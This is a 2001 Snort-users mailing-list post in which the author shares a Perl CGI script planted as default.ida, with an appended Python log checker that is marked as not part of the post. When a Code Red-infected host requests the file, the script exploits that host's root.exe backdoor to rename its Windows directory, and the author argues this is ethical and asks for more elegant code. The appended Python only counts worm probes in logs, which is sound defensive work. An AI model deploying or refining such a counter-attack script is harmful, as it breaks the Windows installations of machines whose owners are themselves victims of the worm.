[Snort-users] Code Red attacks

F.M. Taylor root at ...28...
Tue Sep 18 07:50:06 EDT 2001

This is a "default.ida" script that I am using on a server somewhere.  It
seems to be working, at least some of the time.

Ethical??  Well, it is a script, on a server that I own, and the only way
it will do anything is if you try to access it.  It doesn't actively look
for anything, it just waits for a service request, and then performs the
requested service.  If you don't want this service, don't request it.

If there is a better way to deliver this service after it has been
requested (more elegant code), let me know. 

root at ...2642...:/htdocs# cat default.ida

$ipAddress = $ENV{'REMOTE_ADDR'};
$newUrl = $ipAddress."/scripts/root.exe?ren+c:\\winnt+c:\\codered\";
system("TERM=vt100;export TERM;lynx \'http://$ipAddress/scripts/root.exe?ren+c:\\winnt+c:\\codered\' >>codered.txt");
print "Content-type: text/html\n\n";
print "<HTML><HEAD>";
print "<META HTTP-EQUIV=\"Refresh\" CONTENT=\"0;url=http://$newUrl\">";
print "</HEAD><BODY></BODY>";
print "</HTML>";
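
An added example, not part of the original post: a passive log check for the same trigger the script above relies on, a worm-style request for default.ida. It parses Common Log Format lines, tallies such requests per source address, and labels them by padding character (N for the original Code Red, X for Code Red II); the log lines, addresses and shortened padding are constructed, and the function names are this example's own.

```python
import re
from collections import Counter, defaultdict

# Common Log Format: host ident user [time] "METHOD target PROTO" status size
CLF = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+)[^"]*" \d{3} \S+$')
# A long run of one padding character after "default.ida?" marks the worm's request.
PROBE = re.compile(r'^/default\.ida\?([NX])\1{20,}', re.IGNORECASE)
LABEL = {"N": "Code Red (N padding)", "X": "Code Red II (X padding)"}


def classify(target):
    """Return a label for a worm-style default.ida request, else None."""
    m = PROBE.match(target)
    return LABEL[m.group(1).upper()] if m else None


def summarize(lines):
    """Tally worm-style requests per source host; count unparseable lines."""
    hits, skipped = defaultdict(Counter), 0
    for line in lines:
        m = CLF.match(line.strip())
        if not m:
            skipped += 1  # e.g. an empty request line logged as "-"
            continue
        host, target = m.groups()
        label = classify(target)
        if label:
            hits[host][label] += 1
    return {h: dict(c) for h, c in hits.items()}, skipped


# Constructed sample log: documentation address ranges, padding shortened to 60.
TS = "[18/Sep/2001:07:41:02 -0400]"
SAMPLE_LOG = [
    f'192.0.2.10 - - {TS} "GET /default.ida?{"N" * 60}%u9090 HTTP/1.0" 404 205',
    f'192.0.2.10 - - {TS} "GET /default.ida?{"N" * 60}%u9090 HTTP/1.0" 404 205',
    f'198.51.100.7 - - {TS} "GET /default.ida?{"X" * 60}%u9090 HTTP/1.0" 404 205',
    f'203.0.113.5 - - {TS} "GET /index.html HTTP/1.0" 200 1043',
    f'203.0.113.5 - - {TS} "GET /default.ida?id=1 HTTP/1.0" 404 205',  # not padded
    f'198.51.100.7 - - {TS} "-" 408 -',  # malformed request, skipped
]

if __name__ == "__main__":
    found, bad = summarize(SAMPLE_LOG)
    for host, counts in sorted(found.items()):
        print(host, counts)
    print("unparseable lines:", bad)
```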

